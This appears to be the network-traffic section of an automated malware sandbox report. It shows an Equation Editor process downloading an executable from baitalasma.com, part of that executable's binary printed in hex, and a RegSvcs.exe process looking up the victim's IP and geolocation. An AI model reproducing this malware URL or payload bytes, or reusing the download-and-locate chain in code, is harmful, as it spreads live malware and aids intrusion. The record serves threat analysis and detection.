                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249165158.101.44.242801304C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              May 4, 2024 10:12:04.278867960 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              May 4, 2024 10:12:04.461009026 CEST274INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 105
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
                                              May 4, 2024 10:12:06.057971001 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              May 4, 2024 10:12:06.230024099 CEST274INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 105
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
                                              May 4, 2024 10:12:07.417736053 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              May 4, 2024 10:12:07.590217113 CEST274INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 105
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249168158.101.44.242802160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              May 4, 2024 10:12:19.909475088 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              May 4, 2024 10:12:20.083189011 CEST274INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 105
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
                                              May 4, 2024 10:12:20.097779989 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              May 4, 2024 10:12:20.395169973 CEST274INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 105
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
                                              May 4, 2024 10:12:23.640651941 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              May 4, 2024 10:12:23.832438946 CEST274INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 105
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.224916438.242.255.1154431924C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampBytes transferredDirectionData
                                              2024-05-04 08:09:30 UTC317OUTGET /T76434567000.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Connection: Keep-Alive
                                              Host: baitalasma.com
                                              2024-05-04 08:09:31 UTC339INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 04 May 2024 08:09:30 GMT
                                              Content-Type: application/x-msdos-program
                                              Content-Length: 1357312
                                              Last-Modified: Fri, 03 May 2024 15:54:50 GMT
                                              Connection: close
                                              ETag: "663508ca-14b600"
                                              Strict-Transport-Security: max-age=15768000; includeSubDomains
                                              X-Powered-By: PleskLin
                                              Accept-Ranges: bytes
                                              2024-05-04 08:09:31 UTC16045INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed
                                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z
                                              2024-05-04 08:09:31 UTC16384INData Raw: 36 e8 6d c3 01 00 8b 47 04 8b 53 04 8b 0e 8d 04 45 02 00 00 00 50 ff 37 8d 0c 51 51 e8 52 c3 01 00 8b 4b 04 83 c4 18 03 4f 04 8b c6 89 4e 04 5f 5e 5b 5d c2 08 00 55 8b ec b8 30 20 00 00 e8 60 d4 03 00 53 56 8b f1 57 8d 46 14 8b c8 89 45 f0 e8 de 1c 00 00 8b 45 08 83 26 00 c6 46 24 00 66 83 38 21 0f 84 34 f1 03 00 8d 4e 04 50 89 4d 08 e8 35 20 00 00 33 f6 33 c0 33 ff 89 75 f8 8b 75 08 32 db 89 45 f4 32 ff 57 8b ce e8 30 01 00 00 6a 20 59 0f b7 00 66 3b c1 0f 84 0a f1 03 00 6a 09 59 66 3b c1 0f 84 fe f0 03 00 8b 75 f8 8b 4d 08 57 e8 09 01 00 00 47 0f b7 00 66 85 c0 0f 84 b8 00 00 00 81 fe 00 10 00 00 0f 8d ac 00 00 00 6a 20 59 66 3b c1 74 3c 6a 09 59 66 3b c1 74 34 6a 22 59 66 3b c1 74 0b 66 89 84 75 d4 df ff ff 46 eb bb 8b 4d 08 57 e8 c4 00 00 00 6a 22 59
                                              Data Ascii: 6mGSEP7QQRKON_^[]U0 `SVWFEE&F$f8!4NPM5 333uu2E2W0j Yf;jYf;uMWGfj Yf;t<jYf;t4j"Yf;tfuFMWj"Y
                                              2024-05-04 08:09:31 UTC16384INData Raw: 00 00 00 8b 75 10 8b 5d d0 83 be 8c 00 00 00 00 0f 85 9b f7 03 00 8b 55 f8 83 c3 02 89 5d d0 e9 9c fd ff ff 0f b7 53 22 8d 43 02 83 c3 22 89 45 f4 8b ca 89 5d d0 83 f9 6d 0f 86 e6 f9 03 00 ba 01 00 00 00 c7 45 e0 01 00 00 00 89 55 e8 83 7d d8 00 b9 01 00 00 00 89 4d dc 0f 84 93 fa 03 00 3b d1 7c 5c 8b 45 f8 3b 46 7c 0f 83 aa 42 04 00 0f b7 10 83 c0 02 89 45 f8 8b c2 25 00 fc 00 00 3d 00 d8 00 00 0f 84 35 fa 03 00 81 fa ff 00 00 00 0f 87 4e fa 03 00 8b ca b8 01 00 00 00 83 e1 07 c1 ea 03 d3 e0 8b 4d f4 84 04 0a 0f 84 5a 04 00 00 8b 4d dc 8b 55 e8 41 89 4d dc 3b ca 7e a4 8b 45 f8 3b 55 e0 0f 85 89 fa 03 00 8b 55 f8 e9 ec fc ff ff 8d 34 53 89 4d cc 89 75 f8 8b de 8b fe 3b f0 0f 82 ba fe ff ff e9 15 ff ff ff 8b 45 f8 3b 46 7c 0f 83 20 42 04 00 83 7d d8 00 0f
                                              Data Ascii: u]U]S"C"E]mEU}M;|\E;F|BE%=5NMZMUAM;~E;UU4SMu;E;F| B}
                                              2024-05-04 08:09:31 UTC16384INData Raw: 0f 84 43 fe ff ff 8b 01 6a 01 ff 10 e9 38 fe ff ff 8b ff fa c9 40 00 f6 c8 40 00 f6 c8 40 00 39 0a 45 00 f6 c8 40 00 87 ca 40 00 53 0a 45 00 69 0a 45 00 7e 0a 45 00 7e 0a 45 00 a9 ca 40 00 cc cc cc cc 55 8b ec 83 ec 64 53 56 57 8b 7d 0c 33 db 89 5d e0 89 5d e8 c7 45 ec 01 00 00 00 8b 07 48 89 5d d0 89 45 a4 8b 45 08 89 5d d8 c7 45 dc 01 00 00 00 89 4d f8 8b 40 04 c7 45 b0 00 00 00 00 c7 45 b8 00 00 00 00 c7 45 bc 01 00 00 00 8b 40 04 c7 45 c0 00 00 00 00 c7 45 c8 00 00 00 00 c7 45 cc 01 00 00 00 66 83 78 08 33 89 5d f4 c7 45 a0 03 00 00 00 0f 85 2d 3f 04 00 be 02 00 00 00 8b 08 89 4d f0 89 75 fc 39 1d 80 23 4d 00 0f 84 f1 03 00 00 32 c0 84 c0 0f 85 ee 03 00 00 a1 84 23 4d 00 38 1d 89 23 4d 00 0f 85 00 3f 04 00 50 51 89 45 0c e8 39 f0 ff ff 84 c0 0f 84 a2
                                              Data Ascii: Cj8@@@9E@@SEiE~E~E@UdSVW}3]]EH]EE]EM@EEE@EEEfx3]E-?Mu9#M2#M8#M?PQE9
                                              2024-05-04 08:09:31 UTC16384INData Raw: f9 02 0f 84 ea 04 00 00 80 7f 0d 00 8b 47 08 8b 70 10 0f 85 cb 02 00 00 8b 4e 0c 8b c1 83 f8 03 0f 85 04 02 00 00 8b cb e8 db ab ff ff dc 3e dd 1e 8b 4e 08 85 c9 0f 84 84 fc ff ff e9 61 51 04 00 83 f8 01 0f 85 c3 04 00 00 8b 4e 0c 3b c8 0f 84 50 02 00 00 83 f9 02 0f 84 53 4e 04 00 83 f8 03 74 1d 8b cb e8 9e ab ff ff 8b cb dd 5d f8 e8 7f c4 ff ff dd 45 f8 dd 1b c7 43 0c 03 00 00 00 8b ce e8 81 ab ff ff e9 28 fe ff ff e8 29 aa ff ff 8b cb 8b f0 e8 20 aa ff ff 3b f0 0f 8d aa fd ff ff 83 7f 04 02 0f 85 88 55 04 00 8b 37 8b ce e8 3e c4 ff ff c6 06 01 e9 c6 fc ff ff 80 7f 0d 00 8b 47 08 8b 58 10 0f 84 6f fe ff ff 8b 5b 10 e9 67 fe ff ff 49 83 f9 09 0f 87 72 52 04 00 ff 24 8d f0 11 41 00 db 03 dd 55 f8 e9 4b fc ff ff 83 f9 01 0f 84 dc 50 04 00 80 7f 0d 00 8b 5f
                                              Data Ascii: GpN>NaQN;PSNt]EC() ;U7>GXo[gIrR$AUKP_
                                              2024-05-04 08:09:31 UTC16384INData Raw: 4c 00 72 ac 47 00 c7 05 18 e3 4c 00 00 00 00 00 c7 05 1c e3 4c 00 00 00 00 00 c7 05 20 e3 4c 00 00 00 00 00 c7 05 24 e3 4c 00 01 00 00 00 66 c7 05 28 e3 4c 00 00 00 c7 05 2c e3 4c 00 4c dc 49 00 c7 05 38 e3 4c 00 ae ac 47 00 c7 05 3c e3 4c 00 00 00 00 00 c7 05 40 e3 4c 00 00 00 00 00 c7 05 44 e3 4c 00 00 00 00 00 c7 05 48 e3 4c 00 01 00 00 00 66 c7 05 4c e3 4c 00 00 00 c7 05 50 e3 4c 00 08 f3 49 00 c7 05 5c e3 4c 00 0c ae 47 00 c7 05 60 e3 4c 00 00 00 00 00 c7 05 64 e3 4c 00 00 00 00 00 c7 05 68 e3 4c 00 00 00 00 00 c7 05 6c e3 4c 00 01 00 00 00 66 c7 05 70 e3 4c 00 00 00 c7 05 74 e3 4c 00 d0 ea 49 00 c7 05 80 e3 4c 00 c2 b0 47 00 c7 05 84 e3 4c 00 00 00 00 00 c7 05 88 e3 4c 00 00 00 00 00 c7 05 8c e3 4c 00 00 00 00 00 c7 05 90 e3 4c 00 01 00 00 00 66 c7
                                              Data Ascii: LrGLL L$Lf(L,LLI8LG<L@LDLHLfLLPLI\LG`LdLhLlLfpLtLILGLLLLf
                                              2024-05-04 08:09:31 UTC16384INData Raw: 00 a3 d4 18 4d 00 ff 05 d0 18 4d 00 b9 b0 18 4d 00 6a 00 89 35 1c 19 4d 00 e8 15 00 00 00 f7 c7 00 00 00 10 0f 85 40 dd 03 00 8b 03 5f 5e 5b c9 c2 20 00 55 8b ec 83 7d 08 00 56 8b f1 0f 85 41 dd 03 00 8b 4e 6c 8b 46 60 5e 8b 04 88 8b 00 66 c7 40 68 00 00 5d c2 04 00 55 8b ec 51 51 83 7d 18 00 0f 85 2c dd 03 00 8b 0d 1c 19 4d 00 83 f9 ff 74 76 83 7d 08 00 0f 85 31 dd 03 00 a1 10 19 4d 00 33 d2 56 57 8b 7d 10 42 8b 04 88 89 55 08 8b 30 8b 06 89 45 f8 85 ff 0f 85 2f dd 03 00 8b fa 83 7d 0c ff 74 20 8d 4d 0c e8 7c 10 00 00 83 7e 4c 00 0f 8d eb dd 03 00 8b 45 0c 6a 01 50 89 46 4c e8 8c 0b 00 00 8b 45 1c 83 f8 ff 75 1e 8b 45 20 83 f8 ff 75 1b 80 7e 38 00 0f 85 d0 dd 03 00 8b c7 5f 5e c9 c2 1c 00 33 c0 eb f8 89 46 50 eb dd 89 46 54 eb e0 55 8b ec ff 75 08 b9 b0
                                              Data Ascii: MMMj5M@_^[ U}VANlF`^f@h]UQQ},Mtv}1M3VW}BU0E/}t M|~LEjPFLEuE u~8_^3FPFTUu
                                              2024-05-04 08:09:31 UTC16384INData Raw: 27 0f 84 d8 f2 03 00 33 c9 89 4d c8 c7 45 f8 e8 03 00 00 85 c0 74 20 8d 4d f8 8b d3 51 50 8d 4d c4 51 ff 75 08 8b c8 e8 60 01 00 00 83 c4 10 85 c0 0f 85 b0 f2 03 00 0f b7 06 89 45 fc 66 8b 7d fc 6a 70 58 e9 da fe ff ff 8b c1 2d 95 00 00 00 0f 84 47 f3 03 00 48 83 e8 01 0f 84 3d f3 03 00 48 83 e8 01 0f 84 33 f3 03 00 48 83 e8 01 0f 85 df fe ff ff e9 24 f3 03 00 66 3b f8 74 56 6a 22 5f 0f b7 1c 37 89 5d fc 8d 43 9e 66 3b c2 0f 86 94 f2 03 00 8b 5d f4 eb 9e 83 f9 5a 0f 87 b1 fe ff ff 0f b7 46 02 66 3b 45 f0 74 0a 66 3b 45 ec 0f 85 9d fe ff ff 83 c6 04 e9 95 fe ff ff 83 f9 60 76 df 6a 61 58 3b c8 0f 85 85 fe ff ff 0f b7 46 04 eb d2 0f b7 7e 02 03 ff eb a5 55 8b ec 83 ec 30 8b c1 89 55 d0 8b 55 10 53 56 8b 08 81 e2 00 08 00 00 33 db 89 45 d4 57 89 55 fc 0f b7
                                              Data Ascii: '3MEt MQPMQu`Ef}jpX-GH=H3H$f;tVj"_7]Cf;]ZFf;Etf;E`vjaX;F~U0UUSV3EWU
                                              2024-05-04 08:09:31 UTC16384INData Raw: 00 50 ff 15 70 c3 49 00 8b 45 f8 33 45 f4 89 45 fc ff 15 80 c1 49 00 31 45 fc ff 15 10 c3 49 00 31 45 fc 8d 45 ec 50 ff 15 bc c1 49 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 c1 c9 c3 8b 0d 14 c0 4c 00 56 57 bf 4e e6 40 bb be 00 00 ff ff 3b cf 74 04 85 ce 75 26 e8 94 ff ff ff 8b c8 3b cf 75 07 b9 4f e6 40 bb eb 0e 85 ce 75 0a 0d 11 47 00 00 c1 e0 10 0b c8 89 0d 14 c0 4c 00 f7 d1 5f 89 0d 10 c0 4c 00 5e c3 b8 00 40 00 00 c3 68 48 07 4d 00 ff 15 74 c3 49 00 c3 b0 01 c3 68 00 00 03 00 68 00 00 01 00 6a 00 e8 68 1a 01 00 83 c4 0c 85 c0 75 01 c3 6a 07 e8 d5 fc ff ff cc b8 50 07 4d 00 c3 e8 4b ea ff ff 8b 48 04 83 08 04 89 48 04 e8 e7 ff ff ff 8b 48 04 83 08 02 89 48 04 c3 33 c0 39 05 18 c0 4c 00 0f 94 c0 c3 b8 24 13 4d 00 c3 b8 20 13 4d 00 c3 53 56 be 70 86 4c
                                              Data Ascii: PpIE3EEI1EI1EEPIEM3E3E3LVWN@;tu&;uO@uGL_L^@hHMtIhhjhujPMKHHHH39L$M MSVpL
                                              2024-05-04 08:09:31 UTC16384INData Raw: ff 75 0c ff 75 08 e8 05 00 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 83 ec 10 8d 4d f0 53 56 ff 75 10 e8 d3 fe ff ff 8b 5d 08 85 db 74 07 8b 75 0c 85 f6 75 1a e8 f4 a7 00 00 c7 00 16 00 00 00 e8 fc dc 00 00 ba ff ff ff 7f e9 8b 00 00 00 8b 45 f4 57 83 b8 a8 00 00 00 00 75 42 6a 41 59 6a 5a 2b de 5a 0f b7 04 33 66 3b c1 72 0d 66 3b c2 77 08 83 c0 20 0f b7 f8 eb 02 8b f8 0f b7 06 66 3b c1 72 0b 66 3b c2 77 06 83 c0 20 0f b7 c0 83 c6 02 66 85 ff 74 3a 66 3b f8 74 c8 eb 33 0f b7 03 8d 4d f4 51 50 e8 9c 92 00 00 8d 4d f4 0f b7 f8 0f b7 06 8d 5b 02 51 50 e8 89 92 00 00 83 c4 10 0f b7 c0 8d 76 02 66 85 ff 74 05 66 3b f8 74 cd 0f b7 d7 0f b7 c0 2b d0 5f 80 7d fc 00 5e 5b 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c2 8b e5 5d c3 8b ff 55 8b ec a1 14 c0 4c 00 83 e0 1f 6a 20
                                              Data Ascii: uu]UMSVu]tuuEWuBjAYjZ+Z3f;rf;w f;rf;w ft:f;t3MQPM[QPvftf;t+_}^[tMP]ULj


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249166172.67.177.1344431304C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-04 08:12:06 UTC86OUTGET /xml/81.181.54.104 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-05-04 08:12:07 UTC699INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:07 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: MISS
                                              Last-Modified: Sat, 04 May 2024 08:12:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TKo4rZw%2FXmpnytayq1iWdk2fALOG3YJqgBf9bxy7uIxbV7%2Bsxogmn%2BQ1mG%2FRto6FWwD3wqfKmwuEIhJseZx3703d4M6p8zceZqFXEgDihwZQoOqTizKAdyijrTA%2Bxeb26Legbh77"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87e706200c110ff4-LAX
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-04 08:12:07 UTC337INData Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c
                                              Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
                                              2024-05-04 08:12:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249167172.67.177.1344431304C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-04 08:12:07 UTC62OUTGET /xml/81.181.54.104 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-05-04 08:12:08 UTC702INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:08 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 1
                                              Last-Modified: Sat, 04 May 2024 08:12:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kM0vQqR0NQO5vMbV2jqj165Rus8GJHnaIwARqIFiLuXdU2mVQyQxqLudryczw6RNEHMPfiyzBSYphj16KDJjycuKiO%2BDr4vp9mx%2F4s0a0TooZzEtOXqc5IVdV1cZ%2FiLojxIZ2udI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 87e706274a4e7d23-LAX
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-04 08:12:08 UTC337INData Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c
                                              Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
                                              2024-05-04 08:12:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.2249169104.21.67.1524432160C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-04 08:12:20 UTC86OUTGET /xml/81.181.54.104 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-05-04 08:12:21 UTC701INHTTP/1.1 200 OK
                                              Date: Sat, 04 May 2024 08:12:21 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
